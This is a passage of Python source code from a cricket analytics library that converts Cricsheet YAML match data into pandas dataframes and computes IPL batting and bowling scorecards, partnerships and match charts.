if 'extras' in team1: #Check if extras are there
# Get the columns in extras for team1
b=team1.extras.apply(pd.Series).columns
# Find the missing extras columns
diff= list(set(extras) - set(b))
print('Team1:diff:',diff)
# Rename extras dict column as there is another column extras which comes from runs_dict
team1=team1.rename(columns={'extras':'extras_dict'})
#Create new columns by splitting dictionary columns - extras and runs
team1=pd.concat([team1,team1['extras_dict'].apply(pd.Series)], axis=1)
# Add the missing columns
for col in diff:
print("team1:",col)
team1[col]=0
team1=team1.drop(columns=0)
else:
print('Team1:Extras not present')
# Rename runs columns to runs_dict
if 'runs' in team1: #Check if runs in team1
team1=team1.rename(columns={'runs':'runs_dict'})
team1=pd.concat([team1,team1['runs_dict'].apply(pd.Series)], axis=1)
else:
print('Team1:Runs not present')
if 'wicket' in team1: #Check if wicket present
# Rename wicket as wicket_dict dict column as there is another wicket column
team1=team1.rename(columns={'wicket':'wicket_dict'})
team1=pd.concat([team1,team1['wicket_dict'].apply(pd.Series)], axis=1)
else:
print('Team1: Wicket not present')
team1['team']=a['innings'][0]['1st innings']['team']
team1=team1.reset_index(inplace=False)
#Rename index to delivery
team1=team1.rename(columns={'index':'delivery'})
# 2nd innings - Check if the 2nd inning was played
if len(a['innings']) > 1: # Team2 played
deliveries=a['innings'][1]['2nd innings']['deliveries']
#Create empty dataframe for team1
team2=pd.DataFrame()
# Loop through all the deliveries of 1st innings
for i in range(len(deliveries)):
df = pd.DataFrame(deliveries[i])
b= df.T
team2=pd.concat([team2,b])
# Rename batsman to striker/non-striker as there is another column batsman who scored runs
team2=team2.rename(columns={'batsman':'striker'})
# Get the columns in extras for team1
if 'extras' in team2: #Check if extras in team2
b=team2.extras.apply(pd.Series).columns
diff= list(set(extras) - set(b))
print('Team2:diff:',diff)
# Rename extras dict column as there is another column extras which comes from runs_dict
team2=team2.rename(columns={'extras':'extras_dict'})
#Create new columns by splitting dictionary columns - extras and runs
team2=pd.concat([team2,team2['extras_dict'].apply(pd.Series)], axis=1)
# Add the missing columns
for col in diff:
print("team2:",col)
team2[col]=0
team2=team2.drop(columns=0)
else:
print('Team2:Extras not present')
# Rename runs columns to runs_dict
if 'runs' in team2:
team2=team2.rename(columns={'runs':'runs_dict'})
team2=pd.concat([team2,team2['runs_dict'].apply(pd.Series)], axis=1)
else:
print('Team2:Runs not present')
if 'wicket' in team2:
# Rename wicket as wicket_dict column as there is another column wicket
team2=team2.rename(columns={'wicket':'wicket_dict'})
team2=pd.concat([team2,team2['wicket_dict'].apply(pd.Series)], axis=1)
else:
print('Team2:wicket not present')
team2['team']=a['innings'][1]['2nd innings']['team']
team2=team2.reset_index(inplace=False)
#Rename index to delivery
team2=team2.rename(columns={'index':'delivery'})
else: # Create empty columns for team2 so that the complete DF as all columns
team2 = pd.DataFrame()
cols=['delivery', 'striker', 'bowler', 'extras_dict', 'non_striker',\
'runs_dict', 'wicket_dict', 'wides', 'noballs', 'legbyes', 'byes', 'penalty',\
'kind','player_out','fielders',\
'batsman', 'extras', 'total', 'team']
team2 = team2.reindex(columns=cols)
#Check for missing columns. It is possible that no wickets for lost in the entire innings
cols=['delivery', 'striker', 'bowler', 'extras_dict', 'non_striker',\
'runs_dict', 'wicket_dict', 'wides', 'noballs', 'legbyes', 'byes', 'penalty',\
'kind','player_out','fielders',\
'batsman', 'extras', 'total', 'team']
# Team1 - missing columns
msngCols=list(set(cols) - set(team1.columns))
print('Team1-missing columns:', msngCols)
for col in msngCols:
print("Adding:team1:",col)
team1[col]=0
# Team2 - missing columns
msngCols=list(set(cols) - set(team2.columns))
print('Team2-missing columns:', msngCols)
for col in msngCols:
print("Adding:team2:",col)
team2[col]=0
# Now both team1 and team2 should have the same columns. Concatenate
team1=team1[['delivery', 'striker', 'bowler', 'extras_dict', 'non_striker',\
'runs_dict', 'wicket_dict', 'wides', 'noballs', 'legbyes', 'byes', 'penalty',\
'kind','player_out','fielders',\
'batsman', 'extras', 'total', 'team']]
team2=team2[['delivery', 'striker', 'bowler', 'extras_dict', 'non_striker',\
'runs_dict', 'wicket_dict', 'wides', 'noballs', 'legbyes', 'byes', 'penalty',\
'kind','player_out','fielders',\
'batsman', 'extras', 'total', 'team']]
df=pd.concat([team1,team2])
#Fill NA's with 0s
df=df.fillna(0)
# Fill in INFO
print("Length of info field=",len(a['info']))
#City
try:
df['city']=a['info']['city']
except:
df['city'] =0
#Date
df['date']=a['info']['dates'][0]
#Gender
df['gender']=a['info']['gender']
#Match type
df['match_type']=a['info']['match_type']
# Neutral venue
try:
df['neutral_venue'] = a['info']['neutral_venue']
except KeyError as error:
df['neutral_venue'] = 0
#Outcome - Winner
try:
df['winner']=a['info']['outcome']['winner']
# Get the win type - runs, wickets etc
df['winType']=list(a['info']['outcome']['by'].keys())[0]
print("Wintype=",list(a['info']['outcome']['by'].keys())[0])
#Get the value of wintype
winType=list(a['info']['outcome']['by'].keys())[0]
print("Win value=",list(a['info']['outcome']['by'].keys())[0] )
# Get the win margin - runs,wickets etc
df['winMargin']=a['info']['outcome']['by'][winType]
print("win margin=", a['info']['outcome']['by'][winType])
except:
df['winner']=0
df['winType']=0
df['winMargin']=0
# Outcome - Tie
try:
df['result']=a['info']['outcome']['result']
df['resultHow']=list(a['info']['outcome'].keys())[0]
df['resultTeam'] = a['info']['outcome']['eliminator']
print(a['info']['outcome']['result'])
print(list(a['info']['outcome'].keys())[0])
print(a['info']['outcome']['eliminator'])
except:
df['result']=0
df['resultHow']=0
df['resultTeam']=0
try:
df['non_boundary'] = a['info']['non_boundary']
except KeyError as error:
df['non_boundary'] = 0
try:
df['ManOfMatch']=a['info']['player_of_match'][0]
except:
df['ManOfMatch']=0
# Identify the winner
df['overs']=a['info']['overs']
df['team1']=a['info']['teams'][0]
df['team2']=a['info']['teams'][1]
df['tossWinner']=a['info']['toss']['winner']
df['tossDecision']=a['info']['toss']['decision']
df['venue']=a['info']['venue']
# Rename column 'striker' to batsman
# Rename column 'batsman' to runs as it signifies runs scored by batsman
df=df.rename(columns={'batsman':'runs'})
df=df.rename(columns={'striker':'batsman'})
if (type(a['info']['dates'][0]) == str):
outfile=a['info']['teams'][0]+ '-' + a['info']['teams'][1] + '-' +a['info']['dates'][0] + '.csv'
else:
outfile=a['info']['teams'][0]+ '-' + a['info']['teams'][1] + '-' +a['info']['dates'][0].strftime('%Y-%m-%d') + '.csv'
destFile=os.path.join(dest,outfile)
print(destFile)
df.to_csv(destFile,index=False)
print("Dataframe shape=",df.shape)
return df, outfile
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: convertAllYaml2PandasDataframesT20
# This function converts all yaml files to Pandas dataframes and saves as CSV
#
###########################################################################################
def convertAllYaml2PandasDataframesT20(source,dest):
'''
Convert and save all Yaml files to pandas dataframes and save as CSV
Description
This function coverts all Yaml files from source directory to data frames. The data frames are
then stored as .csv. The saved files are of the format team1-team2-date.RData For
e.g. England-India-2008-04-06.RData etc
Usage
convertAllYaml2PandasDataframesT20(sourceDir=".",targetDir=".")
Arguments
sourceDir
The source directory of the yaml files
targetDir
The target directory in which the data frames are stored as RData files
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
convertYaml2PandasDataframe
Examples
# In the example below ../yamldir is the source dir for the yaml files
convertAllYaml2PandasDataframesT20("../yamldir","../data")
'''
files = os.listdir(source)
for index, file in enumerate(files):
print("\n\nFile no=",index)
if file.endswith(".yaml"):
df, filename = convertYaml2PandasDataframeT20(file, source, dest)
#print(filename)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getRuns
# This function gets the runs scored by batsmen
#
###########################################################################################
def getRuns(df):
df1=df[['batsman','runs','extras','total','non_boundary']]
# Determine number of deliveries faced and runs scored
runs=df1[['batsman','runs']].groupby(['batsman'],sort=False,as_index=False).agg(['count','sum'])
# Drop level 0
runs.columns = runs.columns.droplevel(0)
runs=runs.reset_index(inplace=False)
runs.columns=['batsman','balls','runs']
return(runs)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getFours
# This function gets the fours scored by batsmen
#
###########################################################################################
def getFours(df):
df1=df[['batsman','runs','extras','total','non_boundary']]
# Get number of 4s. Check if it is boundary (non_boundary=0)
m=df1.loc[(df1.runs >=4) & (df1.runs <6) & (df1.non_boundary==0)]
# Count the number of 4s
noFours= m[['batsman','runs']].groupby('batsman',sort=False,as_index=False).count()
noFours.columns=['batsman','4s']
return(noFours)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getSixes
# This function gets the sixes scored by batsmen
#
###########################################################################################
def getSixes(df):
df1=df[['batsman','runs','extras','total','non_boundary']]
df2= df1.loc[(df1.runs ==6)]
sixes= df2[['batsman','runs']].groupby('batsman',sort=False,as_index=False).count()
sixes.columns=['batsman','6s']
return(sixes)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getExtras
# This function gets the extras for the team
#
###########################################################################################
def getExtras(df):
df3= df[['total','wides', 'noballs', 'legbyes', 'byes', 'penalty', 'extras']]
a=df3.sum().astype(int)
#Convert series to dataframe
extras=a.to_frame().T
return(extras)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBattingScorecardMatch
# This function returns the team batting scorecard
#
###########################################################################################
def teamBattingScorecardMatch (match,theTeam):
'''
Team batting scorecard of a team in a match
Description
This function computes returns the batting scorecard (runs, fours, sixes, balls played) for the team
Usage
teamBattingScorecardMatch(match,theTeam)
Arguments
match
The match for which the score card is required e.g.
theTeam
Team for which scorecard required
Value
scorecard A data frame with the batting scorecard
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBatsmenPartnershipMatch
teamBowlingScorecardMatch
teamBatsmenVsBowlersMatch
Examples
x1,y1=teamBattingScorecardMatch(kkr_sh,"Sunrisers Hyderabad")
print(x1)
print(y1)
'''
scorecard=pd.DataFrame()
if(match.size != 0):
team=match.loc[match['team'] == theTeam]
else:
return(scorecard,-1)
a1= getRuns(team)
b1= getFours(team)
c1= getSixes(team)
# Merge columns
d1=pd.merge(a1, b1, how='outer', on='batsman')
e=pd.merge(d1,c1,how='outer', on='batsman')
e=e.fillna(0)
e['4s']=e['4s'].astype(int)
e['6s']=e['6s'].astype(int)
e['SR']=(e['runs']/e['balls']) *100
scorecard = e[['batsman','runs','balls','4s','6s','SR']]
extras=getExtras(match)
return(scorecard,extras)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getRunsConceded
# This function gets the runs conceded by bowler
#
###########################################################################################
def getRunsConceded(df):
# Note the column batsman has the runs scored by batsman
df1=df[['bowler','runs','wides', 'noballs']]
df2=df1.groupby('bowler').sum()
# Only wides and no balls included in runs conceded
df2['runs']=(df2['runs']+df2['wides']+df2['noballs']).astype(int)
df3 = df2['runs']
return(df3)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getOvers
# This function gets the overs for bowlers
#
###########################################################################################
def getOvers(df):
df1=df[['bowler','delivery']]
df2=(df1.groupby('bowler').count()/6).astype(int)
df2.columns=['overs']
return(df2)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getMaidens
# This function gets the maiden overs for bowlers
#
###########################################################################################
def getMaidens(df):
df1=df[['bowler','delivery','runs','wides', 'noballs']]
# Get the over
df1['over']=df1.delivery.astype(int)
# Runs conceded includes wides and noballs
df1['runsConceded']=df1['runs'] + df1['wides'] + df1['noballs']
df2=df1[['bowler','over','runsConceded']]
# Compute runs in each over by bowler
df3=df2.groupby(['bowler','over']).sum()
df4=df3.reset_index(inplace=False)
# If maiden set as 1 else as 0
df4.loc[df4.runsConceded !=0,'maiden']=0
df4.loc[df4.runsConceded ==0,'maiden']=1
# Sum te maidens
df5=df4[['bowler','maiden']].groupby('bowler').sum()
return(df5)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: getWickets
# This function gets the wickets for bowlers
#
###########################################################################################
def getWickets(df):
df1=df[['bowler','kind', 'player_out', 'fielders']]
# Check if the team took wickets. Then this column will be a string
if isinstance(df1.player_out.iloc[0],str):
df2= df1[df1.player_out !='0']
df3 = df2[['bowler','player_out']].groupby('bowler').count()
else: # Did not take wickets. Set wickets as 0
df3 = df1[['bowler','player_out']].groupby('bowler').count()
df3['player_out']=0 # Set wicktes as 0
return(df3)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBowlingScorecardMatch
# This function gets the bowling scorecard
#
###########################################################################################
def teamBowlingScorecardMatch (match,theTeam):
'''
Compute and return the bowling scorecard of a team in a match
Description
This function computes and returns the bowling scorecard of a team in a match
Usage
teamBowlingScorecardMatch(match,theTeam)
Arguments
match
The match between the teams
theTeam
Team for which bowling performance is required
Value
l A data frame with the bowling performance in alll matches against all oppositions
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingWicketMatch
teamBowlersVsBatsmenMatch
teamBattingScorecardMatch
Examples
m=teamBowlingScorecardMatch(kkr_sh,"Sunrisers Hyderabad")
print(m)
'''
team=match.loc[match.team== theTeam]
# Compute overs bowled
a1= getOvers(team).reset_index(inplace=False)
# Compute runs conceded
b1= getRunsConceded(team).reset_index(inplace=False)
# Compute maidens
c1= getMaidens(team).reset_index(inplace=False)
# Compute wickets
d1= getWickets(team).reset_index(inplace=False)
e1=pd.merge(a1, b1, how='outer', on='bowler')
f1= pd.merge(e1,c1,how='outer', on='bowler')
g1= pd.merge(f1,d1,how='outer', on='bowler')
g1 = g1.fillna(0)
# Compute economy rate
g1['econrate'] = g1['runs']/g1['overs']
g1.columns=['bowler','overs','runs','maidens','wicket','econrate']
g1.maidens = g1.maidens.astype(int)
g1.wicket = g1.wicket.astype(int)
return(g1)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBatsmenPartnershipMatch
# This function gets the batting partnerships
#
###########################################################################################
def teamBatsmenPartnershipMatch(match,theTeam,opposition,plot=True,savePic=False, dir1=".",picFile="pic1.png"):
'''
Team batting partnerships of batsmen in a match
Description
This function plots the partnerships of batsmen in a match against an opposition or it can return the data frame
Usage
teamBatsmenPartnershipMatch(match,theTeam,opposition, plot=TRUE)
Arguments
match
The match between the teams
theTeam
The team for which the the batting partnerships are sought
opposition
The opposition team
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
df The data frame of the batsmen partnetships
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBattingScorecardMatch
teamBowlingWicketKindMatch
teamBatsmenVsBowlersMatch
matchWormChart
Examples
teamBatsmenPartnershipMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=True)
m=teamBatsmenPartnershipMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=False)
print(m)
'''
df1=match.loc[match.team== theTeam]
df2= df1[['batsman','runs','non_striker']]
if plot == True:
df3=df2.groupby(['batsman','non_striker']).sum().unstack().fillna(0)
rcParams['figure.figsize'] = 10, 6
df3.plot(kind='bar',stacked=True)
plt.xlabel('Batsman')
plt.ylabel('Runs')
plt.title(theTeam + ' -batting partnership- vs ' + opposition)
plt.text(4, 30,'Data source-Courtesy:http://cricsheet.org',
horizontalalignment='center',
verticalalignment='center',
)
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
df3=df2.groupby(['batsman','non_striker']).sum().reset_index(inplace=False)
return(df3)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBatsmenPartnershipMatch
# This function gives the performances of batsmen vs bowlers
#
###########################################################################################
def teamBatsmenVsBowlersMatch(match,theTeam,opposition, plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Team batsmen against bowlers in a match
Description
This function plots the performance of batsmen versus bowlers in a match or it can return the data frame
Usage
teamBatsmenVsBowlersMatch(match,theTeam,opposition, plot=TRUE)
Arguments
match
The match between the teams
theTeam
The team for which the the batting partnerships are sought
opposition
The opposition team
plot
If plot=TRUE then a plot is created otherwise a data frame is return
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
b The data frame of the batsmen vs bowlers performance
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingWicketKindMatch
teamBowlingWicketMatch
Examples
teamBatsmenVsBowlersMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=True)
'''
df1=match.loc[match.team== theTeam]
df2= df1[['batsman','runs','bowler']]
if plot == True:
df3=df2.groupby(['batsman','bowler']).sum().unstack().fillna(0)
df3.plot(kind='bar',stacked=True)
rcParams['figure.figsize'] = 10, 6
plt.xlabel('Batsman')
plt.ylabel('Runs')
plt.title(theTeam + ' -Batsman vs Bowler- in match against ' + opposition)
plt.text(4, 30,'Data source-Courtesy:http://cricsheet.org',
horizontalalignment='center',
verticalalignment='center',
)
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
df3=df2.groupby(['batsman','bowler']).sum().reset_index(inplace=False)
return(df3)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBowlingWicketKindMatch
# This function gives the wicket kind for bowlers
#
###########################################################################################
def teamBowlingWicketKindMatch(match,theTeam,opposition, plot=True,savePic=False, dir1=".",picFile="pic1.png"):
'''
Compute and plot the wicket kinds by bowlers in match
Description
This function computes returns kind of wickets (caught, bowled etc) of bowlers in a match between 2 teams
Usage
teamBowlingWicketKindMatch(match,theTeam,opposition,plot=TRUE)
Arguments
match
The match between the teams
theTeam
Team for which bowling performance is required
opposition
The opposition team
plot
If plot= TRUE the dataframe will be plotted else a data frame will be returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None or data fame A data frame with the bowling performance in alll matches against all oppositions
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingWicketMatch
teamBowlingWicketRunsMatch
teamBowlersVsBatsmenMatch
Examples
teamBowlingWicketKindMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=True)
m=teamBowlingWicketKindMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=False)
print(m)
'''
df1=match.loc[match.team== theTeam]
df2= df1[['bowler','kind','player_out']]
# Find all rows where there was a wicket
df3=df2[df2.player_out != '0']
if plot == True:
# Find the different types of wickets for each bowler
df4=df3.groupby(['bowler','kind']).count().unstack().fillna(0)
df4.plot(kind='bar',stacked=True)
rcParams['figure.figsize'] = 10, 6
plt.xlabel('Batsman')
plt.ylabel('Runs')
plt.title(theTeam + ' -Wicketkind vs Runs- given against ' + opposition)
plt.text(4, 30,'Data source-Courtesy:http://cricsheet.org',
horizontalalignment='center',
verticalalignment='center',
)
if(savePic):
plt.savefig(os.path.join(dir1,picFile))
else:
plt.show()
plt.gcf().clear()
else:
# Find the different types of wickets for each bowler
df4=df3.groupby(['bowler','kind']).count().reset_index(inplace=False)
return(df4)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBowlingWicketMatch
# This function gives the wickets for bowlers
#
###########################################################################################
def teamBowlingWicketMatch(match,theTeam,opposition, plot=True,savePic=False, dir1=".",picFile="pic1.png"):
'''
Compute and plot wickets by bowlers in match
Description
This function computes returns the wickets taken bowlers in a match between 2 teams
Usage
teamBowlingWicketMatch(match,theTeam,opposition, plot=TRUE)
Arguments
match
The match between the teams
theTeam
Team for which bowling performance is required
opposition
The opposition team
plot
If plot= TRUE the dataframe will be plotted else a data frame will be returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None or data fame A data frame with the bowling performance in alll matches against all oppositions
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingWicketMatch
teamBowlingWicketRunsMatch
teamBowlersVsBatsmenMatch
Examples
teamBowlingWicketMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=True)
'''
df1=match.loc[match.team== theTeam]
df2= df1[['bowler','kind','player_out']]
# Find all rows where there was a wicket
df3=df2[df2.player_out != '0']
if plot == True:
# Find the different types of wickets for each bowler
df4=df3.groupby(['bowler','player_out']).count().unstack().fillna(0)
df4.plot(kind='bar',stacked=True)
rcParams['figure.figsize'] = 10, 6
plt.xlabel('Batsman')
plt.ylabel('Runs')
plt.title(theTeam + ' -No of Wickets vs Runs conceded- against ' + opposition)
plt.text(1, 1,'Data source-Courtesy:http://cricsheet.org',
horizontalalignment='center',
verticalalignment='center',
)
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
# Find the different types of wickets for each bowler
df4=df3.groupby(['bowler','player_out']).count().reset_index(inplace=False)
return(df4)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: teamBowlersVsBatsmenMatch
# This function gives the bowlers vs batsmen and runs conceded
#
###########################################################################################
def teamBowlersVsBatsmenMatch (match,theTeam,opposition, plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Team bowlers vs batsmen in a match
Description
This function computes performance of bowlers of a team against an opposition in a match
Usage
teamBowlersVsBatsmenMatch(match,theTeam,opposition, plot=TRUE)
Arguments
match
The data frame of the match. This can be obtained with the call for e.g a <- getMatchDetails("England","Pakistan","2006-09-05",dir="../temp")
theTeam
The team against which the performance is required
opposition
The opposition team
plot
This parameter specifies if a plot is required, If plot=FALSE then a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None or dataframe If plot=TRUE there is no return. If plot=TRUE then the dataframe is returned
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBattingScorecardMatch
teamBowlingWicketKindMatch
matchWormChart
Examples
teamBowlersVsBatsmenMatch(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad",plot=True)
'''
df1=match.loc[match.team== theTeam]
df2= df1[['batsman','runs','bowler']]
if plot == True:
df3=df2.groupby(['batsman','bowler']).sum().unstack().fillna(0)
df3.plot(kind='bar',stacked=True)
rcParams['figure.figsize'] = 10, 6
plt.xlabel('Batsman')
plt.ylabel('Runs')
plt.title(theTeam + ' -Bowler vs Batsman- against ' + opposition)
plt.text(4, 20,'Data source-Courtesy:http://cricsheet.org',
horizontalalignment='center',
verticalalignment='center',
)
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
df3=df2.groupby(['batsman','bowler']).sum().reset_index(inplace=False)
return(df3)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: matchWormChart
# This function draws the match worm chart
#
###########################################################################################
def matchWormChart(match,team1,team2,plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot the match worm graph
Description
This function plots the match worm graph between 2 teams in a match
Usage
matchWormGraph(match,t1,t2)
Arguments
match
The dataframe of the match
team1
The 1st team of the match
team2
the 2nd team in the match
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
none
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBatsmenVsBowlersMatch
teamBowlingWicketKindMatch
Examples
## Not run:
#Get the match details
a <- getMatchDetails("England","Pakistan","2006-09-05",dir="../temp")
# Plot tne match worm plot
matchWormChart(kkr_sh,"Kolkata Knight Riders","Sunrisers Hyderabad")
'''
df1=match.loc[match.team==team1]
df2=match.loc[match.team==team2]
df3=df1[['delivery','total']]
df3['cumsum']=df3.total.cumsum()
df4 = df2[['delivery','total']]
df4['cumsum'] = df4.total.cumsum()
df31 = df3[['delivery','cumsum']]
df41 = df4[['delivery','cumsum']]
#plt.plot(df3.delivery.values,df3.cumsum.values)
df51= pd.merge(df31,df41,how='outer', on='delivery').dropna()
df52=df51.set_index('delivery')
df52.columns = [team1,team2]
df52.plot()
rcParams['figure.figsize'] = 10, 6
plt.xlabel('Delivery')
plt.ylabel('Runs')
plt.title('Match worm chart ' + team1 + ' vs ' + team2)
plt.text(10, 10,'Data source-Courtesy:http://cricsheet.org',
horizontalalignment='center',
verticalalignment='center',
)
if plot == True:
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: getAllMatchesBetweenTeams
# This function gets all the matches between 2 IPL teams
#
###########################################################################################
def getAllMatchesBetweenTeams(team1,team2,dir=".",save=False,odir="."):
'''
Get data on all matches between 2 opposing teams
Description
This function gets all the data on matches between opposing IPL teams This can be saved
by the user which can be used in function in which analyses are done for all matches
between these teams.
Usage
getAllMatchesBetweenTeams(team1,team2,dir=".",save=FALSE)
Arguments
team1
One of the team in consideration e.g (KKR, CSK etc)
team2
The other team for which matches are needed e.g( MI, GL)
dir
The directory which has the RData files of matches between teams
save
Default=False. This parameter indicates whether the combined data frame
needs to be saved or not. It is recommended to save this large dataframe as
the creation of this data frame takes a several seconds depending on the number of matches
Value
matches - The combined data frame
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
plotWinsbyTossDecision
teamBowlersVsBatsmenOppnAllMatches
'''
# Create the 2 combinations
t1 = team1 +'-' + team2 + '*.csv'
t2 = team2 + '-' + team1 + '*.csv'
path1= os.path.join(dir,t1)
path2 = os.path.join(dir,t2)
files = glob.glob(path1) + glob.glob(path2)
print(len(files))
# Save as CSV only if there are matches between the 2 teams
if len(files) !=0:
df = pd.DataFrame()
for file in files:
df1 = pd.read_csv(file)
df=pd.concat([df,df1])
if save==True:
dest= team1 +'-' + team2 + '-allMatches.csv'
output=os.path.join(odir,dest)
df.to_csv(output)
else:
return(df)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: saveAllMatchesBetween2IPLTeams
# This function saves all the matches between allIPL teams
#
###########################################################################################
def saveAllMatchesBetween2IPLTeams(dir1,odir="."):
'''
Saves all matches between 2 IPL teams as dataframe
Description
This function saves all matches between 2 IPL teams as a single dataframe in the
current directory
Usage
saveAllMatchesBetween2IPLTeams(dir)
Arguments
dir
Directory to store saved matches
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenVsBowlersOppnAllMatches
'''
teams = ["Chennai Super Kings","Deccan Chargers","Delhi Daredevils",
"Kings XI Punjab", 'Kochi Tuskers Kerala',"Kolkata Knight Riders",
"Mumbai Indians", "Pune Warriors","Rajasthan Royals",
"Royal Challengers Bangalore","Sunrisers Hyderabad","Gujarat Lions",
"Rising Pune Supergiants"]
for team1 in teams:
for team2 in teams:
if team1 != team2:
print("Team1=",team1,"team2=", team2)
getAllMatchesBetweenTeams(team1,team2,dir=dir1,save=True,odir=odir)
time.sleep(2) #Sleep before next save
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBatsmenPartnershiOppnAllMatches
# This function gets the partnetships for a team in all matches
#
###########################################################################################
def teamBatsmenPartnershiOppnAllMatches(matches,theTeam,report="summary",top=5):
'''
Team batting partnership against a opposition all IPL matches
Description
This function computes the performance of batsmen against all bowlers of an oppositions in
all matches. This function returns a dataframe
Usage
teamBatsmenPartnershiOppnAllMatches(matches,theTeam,report="summary")
Arguments
matches
All the matches of the team against the oppositions
theTeam
The team for which the the batting partnerships are sought
report
If the report="summary" then the list of top batsmen with the highest partnerships
is displayed. If report="detailed" then the detailed break up of partnership is returned
as a dataframe
top
The number of players to be displayed from the top
Value
partnerships The data frame of the partnerships
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBatsmenVsBowlersOppnAllMatchesPlot
teamBatsmenPartnershipOppnAllMatchesChart
'''
df1 = matches[matches.team == theTeam]
df2 = df1[['batsman','non_striker','runs']]
# Compute partnerships
df3=df2.groupby(['batsman','non_striker']).sum().reset_index(inplace=False)
df3.columns = ['batsman','non_striker','partnershipRuns']
# Compute total partnerships
df4 = df3.groupby('batsman').sum().reset_index(inplace=False).sort_values('partnershipRuns',ascending=False)
